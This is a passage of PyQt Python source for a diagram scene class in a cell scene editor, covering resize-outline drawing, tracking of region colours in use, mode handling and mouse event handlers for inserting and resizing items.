QtCore.Qt.DotLine, QtCore.Qt.RoundCap, QtCore.Qt.RoundJoin)\n lOutlinePen.setCosmetic(True)\n pPainter.setPen(lOutlinePen)\n pPainter.drawRect(lBoundingRect)\n\n # draw circles at the rectangular outline's vertices:\n\n pPainter.setBackgroundMode( QtCore.Qt.OpaqueMode )\n \n pPainter.setBrush( QtGui.QBrush( QtGui.QColor(219, 230, 249) ) )\n lOutlineColor = QtGui.QColor(35, 166, 94)\n lOutlinePen = QtGui.QPen(lOutlineColor, 0.0, QtCore.Qt.SolidLine, QtCore.Qt.RoundCap, QtCore.Qt.RoundJoin)\n lOutlinePen.setCosmetic(True)\n pPainter.setPen(lOutlinePen)\n # 2011 Mitja - zoom the ellipses smaller as the scene zooms bigger, and vice versa\n # so that they'll appear at the same size any time to the user resizing the items.\n pPainter.drawEllipse(lBoundingRect.bottomLeft(), (4 / self.myViewScaleZoomX), (4 / self.myViewScaleZoomY))\n pPainter.drawEllipse(lBoundingRect.bottomRight(), (4 / self.myViewScaleZoomX), (4 / self.myViewScaleZoomY))\n pPainter.drawEllipse(lBoundingRect.topRight(), (4 / self.myViewScaleZoomX), (4 / self.myViewScaleZoomY))\n pPainter.drawEllipse(lBoundingRect.topLeft(), (4 / self.myViewScaleZoomX), (4 / self.myViewScaleZoomY))\n\n pPainter.setBrush( QtGui.QBrush( QtGui.QColor(255, 255, 0) ) )\n if self.myOutlineResizingVertex == \"bottomLeft\":\n pPainter.drawEllipse(lBoundingRect.bottomLeft(), (4 / self.myViewScaleZoomX), (4 / self.myViewScaleZoomY))\n elif self.myOutlineResizingVertex == \"bottomRight\":\n pPainter.drawEllipse(lBoundingRect.bottomRight(), (4 / self.myViewScaleZoomX), (4 / self.myViewScaleZoomY))\n elif self.myOutlineResizingVertex == \"topRight\":\n pPainter.drawEllipse(lBoundingRect.topRight(), (4 / self.myViewScaleZoomX), (4 / self.myViewScaleZoomY))\n elif self.myOutlineResizingVertex == \"topLeft\":\n pPainter.drawEllipse(lBoundingRect.topLeft(), (4 / self.myViewScaleZoomX), (4 / self.myViewScaleZoomY))\n \n # restore the painter's pen & background to what they were before this function:\n pPainter.setPen(lTmpPen)\n pPainter.setBrush(lTmpBrush)\n pPainter.setBackground(lTmpBackground)\n pPainter.setBackgroundMode(lTmpBackgroundMode)\n \n # emit:\n self.signalThatItemResized.emit(lBoundingRect)\n\n\n\n # 2010 - Mitja - draw an overlay outline of the item being resized\n # by right-clicking (or control-clicking, depending on Qt settings) mouse motion:\n elif self.myRightButtonResizingItem != None:\n lBoundingRect = self.myRightButtonResizingItem.sceneBoundingRect()\n lTmpPen = pPainter.pen()\n\n # draw in two colors, solid and dotted:\n lOutlineColor = QtGui.QColor(224, 100, 0)\n # we set al QtGui.QPen sizes to 0.0 for cosmetic lines that have to remain of minimal line-width when zooming:\n lOutlinePen = QtGui.QPen(lOutlineColor, 0.0, QtCore.Qt.SolidLine, QtCore.Qt.RoundCap, QtCore.Qt.RoundJoin)\n # lOutlinePen = QtGui.QPen(lOutlineColor, 2, QtCore.Qt.SolidLine, QtCore.Qt.RoundCap, QtCore.Qt.RoundJoin)\n lOutlinePen.setCosmetic(True)\n pPainter.setPen(lOutlinePen)\n pPainter.drawRect(lBoundingRect)\n\n lOutlineColor = QtGui.QColor(255, 220, 0)\n lOutlinePen = QtGui.QPen(lOutlineColor, 0.0, QtCore.Qt.DotLine, QtCore.Qt.RoundCap, QtCore.Qt.RoundJoin)\n lOutlinePen.setCosmetic(True)\n pPainter.setPen(lOutlinePen)\n pPainter.drawRect(lBoundingRect)\n\n pPainter.setPen(lTmpPen)\n \n # clear the flag that signals drawForeground() in progress...\n # ....to prevent recursive repaints (shouldn't this be handled automatically by Qt?!?) :\n self.isDrawForegroundInProgress = False\n\n # end of def drawForeground(self, pPainter, pRect)\n # ------------------------------------------------------------\n\n \n # ------------------------------------------------------------\n # 2010 - Mitja: we could reimplement drawBackground() because\n # we don't want a tiled image as background\n #\n # ...we don't reimplement it for now....\n # ------------------------------------------------------------\n # def drawBackground(self, pPainter, pRect):\n # super(DiagramScene, self).drawBackground(pPainter, pRect)\n\n\n\n\n # ------------------------------------------------------------\n # 2010 - Mitja - we reimplement addItem() because\n # we want to add a toolTip to each item that's added to the scene,\n # 2010 - Mitja: and because we can have a unique sequential ID for each\n # scene item this way.\n # ------------------------------------------------------------\n def addItem(self, pGraphicsItem):\n self.totalItemsCounter = self.totalItemsCounter + 1\n pGraphicsItem.setToolTip(str(self.totalItemsCounter))\n pGraphicsItem.setRegionID(self.totalItemsCounter)\n super(DiagramScene, self).addItem(pGraphicsItem)\n # end of def addItem(self)\n # ---------------------------------------------------------\n\n\n\n # ------------------------------------------------------------\n # 2011 - Mitja: add another color as in use by a region in the Cell Scene:\n # ------------------------------------------------------------\n def addToRegionColorsInUse(self, pColor):\n CDConstants.printOut(\"==================================== addToRegionColorsInUse\", CDConstants.DebugTODO )\n\n # retrieve the region \"name(color)\" dictionary from the table of regions:\n lRegionsTableDict = self.parentWidget.parentWindow.theTableOfTypes.getRegionsDict()\n lKeys = lRegionsTableDict.keys()\n # lColor is the color for which we have to update the use count:\n lColor = QtGui.QColor(pColor)\n # lCount is where we temporary place the count of regions using lColor:\n lCount = 0\n\n # find the name corresponding to the added color, and add it to the scene's regionUseDict:\n for i in xrange(len(lRegionsTableDict)) :\n\n if lRegionsTableDict[lKeys[i]][0].rgba() == lColor.rgba() :\n\n # check if there is already an entry for this color in the self.regionUseDict :\n if lColor.rgba() not in self.regionUseDict:\n CDConstants.printOut(\"NO \"+str(lColor.rgba())+\" not in \"+str(self.regionUseDict), CDConstants.DebugTODO )\n # add a new entry to the self.regionUseDict local dictionary of used colors :\n lCount = 1\n else:\n CDConstants.printOut(\"YES \"+str(lColor.rgba())+\" in \"+str(self.regionUseDict), CDConstants.DebugTODO )\n # increment the current entry in the self.regionUseDict local dictionary of used colors:\n lCount = 1 + self.regionUseDict[ lColor.rgba() ][1]\n\n self.regionUseDict[ lColor.rgba() ] = [ lRegionsTableDict[lKeys[i]][1], lCount ]\n \n CDConstants.printOut( str(self.regionUseDict[ lColor.rgba() ][0])+\" \"+str(self.regionUseDict[ lColor.rgba() ][1]) , CDConstants.DebugTODO )\n\n # signal upstream about the updated usage of this region color:\n self.parentWidget.parentWindow.theTableOfTypes.updateRegionUseOfTableElements(lColor, lCount)\n\n # if there is at least one color in the regionUseDict table, show the table:\n# if self.regionUseDict :\n# # we can test the dict this way because, according to the Python manual,\n# # \"any empty sequence, for example, '', (), []\" is considered false.\n# self.parentWidget.signalVisibilityPIFRegionTable.emit(\"Show\")\n CDConstants.printOut(\"addToRegionColorsInUse - regionUseDict = \"+str(self.regionUseDict) , CDConstants.DebugTODO )\n CDConstants.printOut(\"==================================== addToRegionColorsInUse\", CDConstants.DebugTODO )\n\n\n # ------------------------------------------------------------\n # 2011 - Mitja: subtract a color from its use by a region in the Cell Scene:\n # ------------------------------------------------------------\n def subtractFromRegionColorsInUse(self, pColor):\n CDConstants.printOut(\"==================================== subtractFromRegionColorsInUse\", CDConstants.DebugTODO )\n\n # retrieve the region \"name(color)\" dictionary from the table of regions:\n lRegionsTableDict = self.parentWidget.parentWindow.theTableOfTypes.getRegionsDict()\n lKeys = lRegionsTableDict.keys()\n # lColor is the color for which we have to update the use count:\n lColor = QtGui.QColor(pColor)\n # lCount is where we temporary place the count of regions using lColor:\n lCount = 0\n\n # find the name corresponding to the added color, and add it to the scene's regionUseDict:\n for i in xrange(len(lRegionsTableDict)) :\n \n if lRegionsTableDict[lKeys[i]][0].rgba() == lColor.rgba() :\n\n # check if there is already an entry for this color in the self.regionUseDict :\n if lColor.rgba() not in self.regionUseDict:\n CDConstants.printOut(\"NO \"+str(lColor.rgba())+\" not in \"+str(self.regionUseDict) , CDConstants.DebugTODO )\n else:\n CDConstants.printOut(\"YES \"+str(lColor.rgba())+\" in \"+str(self.regionUseDict) , CDConstants.DebugTODO )\n # decrement the current entry in the self.regionUseDict local dictionary of used colors:\n lCount = -1 + self.regionUseDict[ lColor.rgba() ][1]\n if (lCount < 1):\n del self.regionUseDict[ lColor.rgba() ]\n CDConstants.printOut(\"self.regionUseDict has now no lColor.rgba() = \"+str(lColor.rgba()) , CDConstants.DebugTODO )\n else:\n self.regionUseDict[ lColor.rgba() ] = [ lRegionsTableDict[lKeys[i]][1], lCount ]\n CDConstants.printOut( str(self.regionUseDict[ lColor.rgba() ][0])+\" \"+str(self.regionUseDict[ lColor.rgba() ][1]) , CDConstants.DebugTODO )\n\n # signal upstream about the updated usage of this region color:\n self.parentWidget.parentWindow.theTableOfTypes.updateRegionUseOfTableElements(lColor, lCount)\n\n # if there is at least one color in the regionUseDict table, show the table:\n# if self.regionUseDict :\n# # we can test the dict this way because, according to the Python manual,\n# # \"any empty sequence, for example, '', (), []\" is considered false.\n# self.parentWidget.signalVisibilityPIFRegionTable.emit(\"Show\")\n CDConstants.printOut(\"subtractFromRegionColorsInUse - regionUseDict = \"+str(self.regionUseDict) , CDConstants.DebugTODO )\n CDConstants.printOut(\"==================================== subtractFromRegionColorsInUse\", CDConstants.DebugTODO )\n\n\n\n\n # ------------------------------------------------------------\n # 2011 - Mitja: obtain the dict for all the used region colors\n # ------------------------------------------------------------\n def getRegionColorsInUse(self):\n return self.regionUseDict\n\n\n\n\n # ------------------------------------------------------------\n # 2011 - Mitja: after obtaining the item's old color (AKA brush)\n # TODO IS THIS comment meaningful?\n # TODO: Fix for automatic cell <-> region for TenByTenBox:\n # ------------------------------------------------------------\n def setItemRegionOrCell(self, pRegionOrCell):\n # copy from setItemColor to set the item regionvscell value\n self.myItemRegionOrCell = pRegionOrCell\n if self.isItemChange(DiagramItem):\n item = self.selectedItems()[0]\n item.setRegionOrCell(self.myItemRegionOrCell)\n\n\n # ------------------------------------------------------------\n def setItemColor(self, color):\n self.myItemColor = color\n if self.isItemChange(DiagramItem):\n item = self.selectedItems()[0]\n\n # 2011 - Mitja: after obtaining the item's old color (AKA brush)\n # also update the scene's regionUseDict since it contains the list of all\n # region colors in use by our scene:\n lSelectedItemColor = item.brush()\n self.subtractFromRegionColorsInUse(lSelectedItemColor)\n\n item.setBrush(self.myItemColor)\n\n # 2011 - Mitja: after setting the lItem's color (AKA brush)\n # also update the regionUseDict since it contains the list of all\n # region colors in use by our scene:\n self.addToRegionColorsInUse(self.myItemColor)\n\n\n\n\n\n # ------------------------------------------------------------\n def setSequenceColor(self, pColor):\n\n if isinstance(self.theImageSequence, CDImageSequence) == True:\n\n # 2011 - Mitja: after obtaining the sequence's old color (AKA brush)\n # also update the scene's regionUseDict since it contains the list of all\n # region colors in use by our scene:\n lOldColor = self.theImageSequence.getSequenceCurrentColor()\n\n self.subtractFromRegionColorsInUse(lOldColor)\n\n self.theImageSequence.setSequenceCurrentColor(pColor)\n\n # 2011 - Mitja: after setting the lItem's color (AKA brush)\n # also update the regionUseDict since it contains the list of all\n # region colors in use by our scene:\n self.addToRegionColorsInUse(pColor)\n\n\n\n # ------------------------------------------------------------\n def setLineColor(self, color):\n self.myLineColor = color\n if self.isItemChange(Arrow):\n item = self.selectedItems()[0]\n item.setColor(self.myLineColor)\n self.update()\n\n # ------------------------------------------------------------\n def setTextColor(self, color):\n self.myTextColor = color\n if self.isItemChange(DiagramTextItem):\n item = self.selectedItems()[0]\n item.setDefaultTextColor(self.myTextColor)\n\n # ------------------------------------------------------------\n def setFont(self, font):\n self.myFont = font\n if self.isItemChange(DiagramTextItem):\n item = self.selectedItems()[0]\n item.setFont(self.myFont)\n\n # ------------------------------------------------------------\n def setMode(self, mode):\n # 2010 - Mitja: reset resizing unless we are in resizing mode\n # and remain in resizing mode:\n if (self.mySceneMode == CDConstants.SceneModeResizeItem) and \\\n (mode == CDConstants.SceneModeResizeItem):\n pass\n else:\n self.stopOutlineResizing()\n self.mySceneMode = mode\n \n # 2011 - Mitja: adapt window title to current mode:\n if self.parentWidget.parentWindow != None:\n if self.mySceneMode == CDConstants.SceneModeInsertItem:\n self.parentWidget.parentWindow.setWindowTitle(\"Cell Scene Editor - Insert Item\")\n elif self.mySceneMode == CDConstants.SceneModeInsertLine:\n self.parentWidget.parentWindow.setWindowTitle(\"Cell Scene Editor - Insert Line\")\n elif self.mySceneMode == CDConstants.SceneModeInsertText:\n self.parentWidget.parentWindow.setWindowTitle(\"Cell Scene Editor - Insert Text\")\n elif self.mySceneMode == CDConstants.SceneModeMoveItem:\n self.parentWidget.parentWindow.setWindowTitle(\"Cell Scene Editor - Move Item\")\n elif self.mySceneMode == CDConstants.SceneModeInsertPixmap:\n self.parentWidget.parentWindow.setWindowTitle(\"Cell Scene Editor - Insert Pixmap\")\n elif self.mySceneMode == CDConstants.SceneModeResizeItem:\n self.parentWidget.parentWindow.setWindowTitle(\"Cell Scene Editor - Resize Item\")\n elif self.mySceneMode == CDConstants.SceneModeImageLayer:\n self.parentWidget.parentWindow.setWindowTitle(\"Cell Scene Editor - Image Layer\")\n elif self.mySceneMode == CDConstants.SceneModeImageSequence:\n self.parentWidget.parentWindow.setWindowTitle(\"Cell Scene Editor - Image Sequence\")\n \n CDConstants.printOut(\"DiagramScene: setMode (mode==\"+str(mode)+\"). \", CDConstants.DebugVerbose )\n\n # end of def setMode(self, mode).\n # ------------------------------------------------------------\n\n\n\n # ------------------------------------------------------------\n def getMode(self):\n return self.mySceneMode\n\n # ------------------------------------------------------------\n def setItemType(self, type):\n self.myItemType = type\n\n # ------------------------------------------------------------\n def handlerForLostFocus(self, item):\n cursor = item.textCursor()\n cursor.clearSelection()\n item.setTextCursor(cursor)\n\n if item.toPlainText():\n self.removeItem(item)\n item.deleteLater()\n\n\n # ------------------------------------------------------------\n # 2010 - Mitja - we add to mousePressEvent()\n # to handle outline-resizing of items and right-button resizing of items\n # ------------------------------------------------------------\n def mousePressEvent(self, pMouseEvent, pThePIFItem=None):\n # 2010 - Mitja: add code for handling insertion of Path items,\n # separately from original drawing code: \n\n # 2011 - Mitja: if in SceneModeImageLayer, then skip all QGraphicsScene\n # event processing, and pass the event to theCDImageLayer's own\n # mousePressEvent handler... unless it's a Path item's event!\n if (self.mySceneMode == CDConstants.SceneModeImageLayer) and (pThePIFItem==None):\n if isinstance(self.theImageLayer, CDImageLayer) == True:\n self.theImageLayer.mousePressEvent(pMouseEvent)\n\n elif (pMouseEvent.button() == QtCore.Qt.LeftButton):\n\n if self.mySceneMode == CDConstants.SceneModeInsertItem:\n self.stopOutlineResizing()\n # CDConstants.printOut( \" \"+str( \"mousePressEvent:\", pMouseEvent, pThePIFItem, self.myItemType )+\" \", CDConstants.DebugTODO )\n # 2010 - Mitja: add code for handling insertion of Path items:\n if (self.myItemType == DiagramItem.PathConst):\n if (pThePIFItem == None) :\n # 2010 - Mitja: if there is no Path yet, make it a simple boring one:\n # CDConstants.printOut( \" \"+str( \"mousePressEvent, nopath\" )+\" \", CDConstants.DebugTODO )\n miBoringPath = QtGui.QPainterPath()\n miBoringPath.addEllipse(-100.0, -50.0, 200.0, 100.0)\n lPath = miBoringPath\n else :\n # CDConstants.printOut( \" \"+str( \"mousePressEvent, with PATH\" )+\" \", CDConstants.DebugTODO )\n lPath = pThePIFItem.path()\n lItem = DiagramItem(lPath, self.myItemMenu)\n else: \n lItem = DiagramItem(self.myItemType, self.myItemMenu)\n lItem.setBrush(self.myItemColor)\n\n # 2011 - Mitja: the new item is a region of cells or a single cell:\n lItem.setRegionOrCell(self.myItemRegionOrCell)\n\n # 2011 - Mitja: after setting the lItem's color (AKA brush)\n # also update the regionUseDict since it contains the list of all\n # region colors in use by our scene:\n self.addToRegionColorsInUse(self.myItemColor)\n\n # 2011 - Mitja: the \"addItem()\" call is what adds lItem to the scene,\n # since without the following call the lItem would never appear:\n self.addItem(lItem)\n\n lItem.setPos(pMouseEvent.scenePos())\n self.signalThatItemInserted.emit(lItem)\n lTmpBoundingRect = lItem.sceneBoundingRect()\n self.signalThatItemResized.emit(lTmpBoundingRect)\n\n elif self.mySceneMode == CDConstants.SceneModeInsertLine:\n self.stopOutlineResizing()\n self.line = QtGui.QGraphicsLineItem(QtCore.QLineF(pMouseEvent.scenePos(),\n pMouseEvent.scenePos()))\n self.line.setPen(QtGui.QPen(self.myLineColor, 2))\n self.addItem(self.line)\n\n elif self.mySceneMode == CDConstants.SceneModeInsertText:\n self.stopOutlineResizing()\n textItem = DiagramTextItem()\n textItem.setFont(self.myFont)\n textItem.setTextInteractionFlags(QtCore.Qt.TextEditorInteraction)\n textItem.setZValue(1000.0)\n textItem.signalLostFocus.connect(self.handlerForLostFocus)\n textItem.signalSelectedChange.connect(self.handlerForItemSelected)\n self.addItem(textItem)\n textItem.setDefaultTextColor(self.myTextColor)\n textItem.setPos(pMouseEvent.scenePos())\n self.signalThatTextInserted.emit(textItem)\n # 2010 - Mitja: add code for handling insertion of pixmap items:\n elif self.mySceneMode == CDConstants.SceneModeInsertPixmap:\n self.stopOutlineResizing()\n if (pThePIFItem == None) :\n # 2010 - Mitja: if there is no pixmap yet, make it a simple boring one:\n lBoringPixMap = QtGui.QPixmap(128, 128)\n lBoringPixMap.fill( QtGui.QColor(QtCore.Qt.darkGray) )\n lPixmap = lBoringPixMap\n else :\n lPixmap = pThePIFItem.pixmap()\n lItem = DiagramPixmapItem(lPixmap, self.myItemMenu)\n self.addItem(lItem)\n # 2010 - Mitja: add code for handling outline resizing of items:\n elif self.mySceneMode == CDConstants.SceneModeResizeItem:\n # check if there's already a selected resizing item:\n if self.myOutlineResizingItem != None:\n # if the second outline is already ON, act upon vertex proximity:\n self.myOutlineResizingVertex = self.isCloseToOutlineVertex( \\\n self.myOutlineResizingItem, pMouseEvent.scenePos() )\n # check if the mouse click happens near a vertex of the resizing outline:\n if self.myOutlineResizingVertex != \"None\":\n # get ready to resize according to the bounding box's vertex:\n self.myOutlineResizingCurrentX = pMouseEvent.scenePos().x()\n self.myOutlineResizingCurrentY = pMouseEvent.scenePos().y()\n # update the scene to affect redrawing of the selected item's outline\n self.update()\n # passing the mouse event upwards would cause the item to be MOVED by the mouse:\n # super(DiagramScene, self).mousePressEvent(pMouseEvent)\n # so we have to return from this function BEFORE it reaches the super() part below:\n return\n # 2010 - Mitja: implement selection of a second outline to resize items:\n lItemAt = self.itemAt(pMouseEvent.scenePos())\n # CDConstants.printOut( \" \"+str( \"lItemAt =\", lItemAt )+\" \", CDConstants.DebugTODO )\n # if we haven't clicked on a QGraphicsItem, there isn't anything to do here:\n if isinstance( lItemAt, QtGui.QGraphicsItem ) != True:\n self.stopOutlineResizing()\n else:\n # if the second outline is ON and the mouse click is not on the\n # currently selected item, then deselect the second outline\n # but keep processing:\n if lItemAt != self.myOutlineResizingItem:\n self.stopOutlineResizing()\n # we've clicked on a different QGraphicsItem than the one resizing,\n # so select the newly clicked item for resizing:\n self.myOutlineResizingItem = lItemAt\n # update the scene, i.e. have the view repaint it:\n # self.update()\n\n # 2010 - Mitja: pass the mouse event upwards, so that it may be moved:\n super(DiagramScene, self).mousePressEvent(pMouseEvent)\n\n # 2010 - Mitja: handle the insertion of Path items:\n # we execute this part only IF the mousePressEvent is generated by our code\n # (i.e. there is no mouse button pressed: we just called this function directly!)\n elif (pMouseEvent.button() == QtCore.Qt.NoButton):\n\n lPath = pThePIFItem.path()\n lItem = DiagramItem(lPath, self.myItemMenu)\n\n # check if pThePIFItem's color has the \"magic\" RGBA value=0,0,0,0\n # which means it's from a Freehand or Polygon drawing, and it has\n # to be assigned the currently selected scene color:\n lRGBAValue = pThePIFItem.brush().color().rgba()\n # CDConstants.printOut( \" \"+str( \"pThePIFItem.brush().color().rgba() =\", lRGBAValue )+\" \", CDConstants.DebugTODO )\n if (lRGBAValue == 0):\n # we use this code if we want to assign a new color to the arriving pThePIFItem:\n lItem.setBrush(self.myItemColor)\n else:\n lItem.setBrush(pThePIFItem.brush())\n\n\n # 2011 - Mitja: the new item is a region of cells or a single cell:\n lRGBAValue = pThePIFItem.pen().color().rgba()\n if ( lRGBAValue == QtGui.QColor(QtCore.Qt.darkMagenta).rgba() ) or \\\n ( lRGBAValue == QtGui.QColor(255, 153, 0).rgba() ):\n # new item's pen color corresponding to either region or cell:\n pass\n else:\n # new item's pen color invalid, set it to be the current selection:\n lItem.setRegionOrCell(self.myItemRegionOrCell)\n\n self.addItem(lItem)\n\n # 2011 - Mitja: after setting the lItem's color (AKA brush)\n # also update the regionUseDict since it contains the list of all\n # region colors in use by our scene:\n self.addToRegionColorsInUse(lItem.brush())\n\n # scenePos() doesn't seem to exist for pMouseEvent, so this won't work:\n # lItem.setPos(pMouseEvent.scenePos())\n # but since the Path item we get from picking the image is not 0-centered,\n # its coordinates are already scene coordinates (not good for scaling!)\n # so at the moment we don't need scenePos()\n # TODO: fix image picking so that objects are 0-centered + have an offset\n\n # first unselect all selected items in the scene:\n for anItem in self.selectedItems():\n anItem.setSelected(False)\n # then select the currently created Path item:\n lItem.setSelected(True)\n\n # do not emit any signal when creating items from the image layer:\n # self.signalThatItemInserted.emit(lItem)\n\n # except:\n # # we got exception to setBrush(), therefore pThePIFItem is NOT a QGraphicsPathItem!\n # # TODO TODO TODO: MAYBE?\n # pass\n # self.addItem(pThePIFItem)\n # # pThePIFItem.setPos(pMouseEvent.scenePos())\n # self.signalThatItemInserted.emit(pThePIFItem)\n # 2010 - Mitja: pass the mouse event upwards:\n # TODO TODO TODO: MAYBE?\n # super(DiagramScene, self).mousePressEvent(pMouseEvent)\n\n # 2010 - Mitja: implement resizing of items in real-time by right-clicking on them:\n elif (pMouseEvent.button() == QtCore.Qt.RightButton):\n lItemAt = self.itemAt(pMouseEvent.scenePos())\n if isinstance( lItemAt, QtGui.QGraphicsItem ):\n lColor = lItemAt.brush().color().rgba()\n self.myRightButtonResizingItem = lItemAt\n self.myRightButtonResizingClickX = pMouseEvent.scenePos().x()\n self.myRightButtonResizingClickY = pMouseEvent.scenePos().y()\n # CDConstants.printOut( \" \"+str( \"mousePressEvent mousePressEvent mousePressEvent =\", pMouseEvent )+\" \", CDConstants.DebugTODO )\n # CDConstants.printOut( \" \"+str( \"myRightButtonResizingItem myRightButtonResizingItem myRightButtonResizingItem =\", self.myRightButtonResizingItem )+\" \", CDConstants.DebugTODO )\n # CDConstants.printOut( \" \"+str( \"lColor lColor lColor =\", lColor )+\" \", CDConstants.DebugTODO )\n # CDConstants.printOut( \" \"+str( \"x, y =\", self.myRightButtonResizingClickX, self.myRightButtonResizingClickY )+\" \", CDConstants.DebugTODO )\n else:\n self.myRightButtonResizingItem = None\n self.myRightButtonResizingClickX = -1.0\n self.myRightButtonResizingClickY = -1.0\n # passing the mouse event upwards would cause the item to be MOVED by the mouse:\n # super(DiagramScene, self).mousePressEvent(pMouseEvent)\n else:\n return\n\n\n # ------------------------------------------------------------\n # 2010 - Mitja - we add more code to mouseMoveEvent()\n # to handle outline-resizing of items and right-button resizing of items,\n # and (2011) SceneModeImageLayer support as well...\n # ------------------------------------------------------------\n def mouseMoveEvent(self, pMouseEvent):\n\n # 2011 - Mitja: if in SceneModeImageLayer, then skip all QGraphicsScene\n # event processing, and pass the event to theCDImageLayer's own\n # mousePressEvent handler:\n if (self.mySceneMode == CDConstants.SceneModeImageLayer):\n if isinstance(self.theImageLayer, CDImageLayer) == True:\n self.theImageLayer.mouseMoveEvent(pMouseEvent)\n\n # 2010 - Mitja: implement right-clicking on items,\n # to resize them in real-time:\n elif self.myRightButtonResizingItem != None:\n if (self.myRightButtonResizingClickX >= 0.0):\n prevX = self.myRightButtonResizingClickX\n prevY = self.myRightButtonResizingClickY\n self.myRightButtonResizingClickX = pMouseEvent.scenePos().x()\n self.myRightButtonResizingClickY = pMouseEvent.scenePos().y()\n else:\n prevX = pMouseEvent.scenePos().x()\n prevY = pMouseEvent.scenePos().y()\n self.myRightButtonResizingClickX = pMouseEvent.scenePos().x()\n self.myRightButtonResizingClickY = pMouseEvent.scenePos().y()\n\n sx = (self.myRightButtonResizingClickX - prevX) / 300.0\n sy = (self.myRightButtonResizingClickY - prevY) / 300.0\n\n self.myRightButtonResizingItem.myScaleX = self.myRightButtonResizingItem.myScaleX + sx\n self.myRightButtonResizingItem.myScaleY = self.myRightButtonResizingItem.myScaleY - sy\n\n # calling setScale() directly on a QGraphicsItem WORKS but it can only scale\n # proportionally, and we want to scale x/y independendently so we don't use it:\n # self.myRightButtonResizingItem.setScale( self.myRightButtonResizingItem.myScaleY )\n\n # using QTransform, we first create a transformation, then we apply it to the item:\n lTransform = QtGui.QTransform()\n lTransform.scale( self.myRightButtonResizingItem.myScaleX, self.myRightButtonResizingItem.myScaleY )\n self.myRightButtonResizingItem.setTransform( lTransform )\n\n # even though setTransform and setTransformations sound similar, they are two\n # DIFFERENT transformation mechanisms provided by Qt... confusing or what?!?\n # using setTransformations does not work this way, so we can't use it here:\n # self.myRightButtonResizingItem.setTransformations( lTransform )\n\n # even though QTransform and QGraphicsTransform sound similar, they are two\n # DIFFERENT transformation mechanisms provided by Qt... confusing or what?!?\n # using QGraphicsTransform does not work this way, so we can't use it here:\n # lQGraphicsScele = QtGui.QGraphicsScale()\n # lQGraphicsScale.setOrigin(QVector3D(QPointF(60,30)))\n # lQGraphicsScele.setXScale( self.myRightButtonResizingItem.myScaleX )\n # lQGraphicsScele.setYScale( self.myRightButtonResizingItem.myScaleY )\n # self.myRightButtonResizingItem.setTransformations( [ lQGraphicsScele ] )\n\n # calling scale() directly on a QGraphicsItem existed in Qt 3.3. but it\n # has been deprecated in Qt 4.x, so we can't use it:\n # self.myRightButtonResizingItem.scale( self.myRightButtonResizingItem.myScaleX, self.myRightButtonResizingItem.myScaleY )\n\n # CDConstants.printOut( \" \"+str( \"pMouseEvent.scenePos().x(), self.myRightButtonResizingClickX, sx, self.myRightButtonResizingItem.myScaleX =\", pMouseEvent.scenePos().x(), self.myRightButtonResizingClickX, sx, self.myRightButtonResizingItem.myScaleX )+\" \", CDConstants.DebugTODO )\n # CDConstants.printOut( \" \"+str( \"pMouseEvent.scenePos().y(), self.myRightButtonResizingClickY, sy, self.myRightButtonResizingItem.myScaleY =\", pMouseEvent.scenePos().y(), self.myRightButtonResizingClickY, sy, self.myRightButtonResizingItem.myScaleY )+\" \", CDConstants.DebugTODO )\n # CDConstants.printOut( \" \"+str( \"self.myRightButtonResizingItem.transformations() =\", self.myRightButtonResizingItem.transformations() )+\" \", CDConstants.DebugTODO )\n\n # 2010 - Mitja: implement a second outline for items, to resize them in real-time:\n elif (self.mySceneMode == CDConstants.SceneModeResizeItem) and (self.myOutlineResizingItem != None):\n # use the mouse relative movement (pointer displacement between events) to\n # compute the amount of scaling\n if (self.myOutlineResizingCurrentX >= 0.0):\n prevX = self.myOutlineResizingCurrentX\n prevY = self.myOutlineResizingCurrentY\n self.myOutlineResizingCurrentX = pMouseEvent.scenePos().x()\n self.myOutlineResizingCurrentY = pMouseEvent.scenePos().y()\n else:\n prevX = pMouseEvent.scenePos().x()\n prevY = pMouseEvent.scenePos().y()\n self.myOutlineResizingCurrentX = pMouseEvent.scenePos().x()\n self.myOutlineResizingCurrentY = pMouseEvent.scenePos().y()\n \n # we compute scaling using the bounding rectangle and the mouse displacement:\n dXmouse = (self.myOutlineResizingCurrentX - prevX)\n dYmouse = (self.myOutlineResizingCurrentY - prevY)\n lBoundingRect = self.myOutlineResizingItem.sceneBoundingRect()\n bWidthX = lBoundingRect.bottomRight().x() - lBoundingRect.topLeft().x()\n bHeightY = lBoundingRect.topRight().y() - lBoundingRect.bottomLeft().y()\n # CDConstants.printOut( \" \"+str( \" ------------------ lBoundingRect befor scaling =\", lBoundingRect )+\" \", CDConstants.DebugTODO )\n\n # A - compute scaling factors along X and Y according to mouse motion:\n if self.myOutlineResizingVertex == \"topRight\":\n sx = (bWidthX + dXmouse) / bWidthX\n sy = (bHeightY + dYmouse) / bHeightY\n elif self.myOutlineResizingVertex == \"topLeft\":\n sx = (bWidthX - dXmouse) / bWidthX\n sy = (bHeightY + dYmouse) / bHeightY\n elif self.myOutlineResizingVertex == \"bottomRight\":\n sx = (bWidthX + dXmouse) / bWidthX\n sy = (bHeightY - dYmouse) / bHeightY\n elif self.myOutlineResizingVertex == \"bottomLeft\":\n sx = (bWidthX - dXmouse) / bWidthX\n sy = (bHeightY - dYmouse) / bHeightY\n else:\n # if we are not resizing the item by dragging one of its corners,\n # then pass the even upstream and return right away!\n super(DiagramScene, self).mouseMoveEvent(pMouseEvent)\n return\n\n self.myOutlineResizingItem.myScaleX = self.myOutlineResizingItem.myScaleX * sx\n self.myOutlineResizingItem.myScaleY = self.myOutlineResizingItem.myScaleY * sy\n # limit diminishing resizing values so that they won't make the item disappear:\n if (self.myOutlineResizingItem.myScaleX < 0.005) :\n self.myOutlineResizingItem.myScaleX = 0.005\n if (self.myOutlineResizingItem.myScaleY < 0.005) :\n self.myOutlineResizingItem.myScaleY = 0.005\n\n # B - apply the scaling transformation to the item:\n # the use of QTransform is as such: first set the transformation, then\n # apply the transformation to the QGraphicsItem:\n lTransform = QtGui.QTransform()\n lTransform.scale( self.myOutlineResizingItem.myScaleX, self.myOutlineResizingItem.myScaleY )\n self.myOutlineResizingItem.setTransform( lTransform )\n # self.update()\n\n # note: the sceneBoundingRect is NOT updated even after the scaling operation!\n # apparently, Qt will update the QGraphicsItem's sceneBoundingRect at redraw only.\n # so the following operations would get the sceneBoundingRect as *before* scaling:\n # lBoundingRect = self.myOutlineResizingItem.sceneBoundingRect()\n\n # C - now fix the item's position according to the scaling transformation,\n # since we want the fixed-point of the transformation to be the vertex corner\n # at the opposite side of the resizing vertex corner (and not the object's center)\n lItemScenePoint = self.myOutlineResizingItem.scenePos()\n if self.myOutlineResizingVertex == \"topRight\":\n lItemNewPosX = 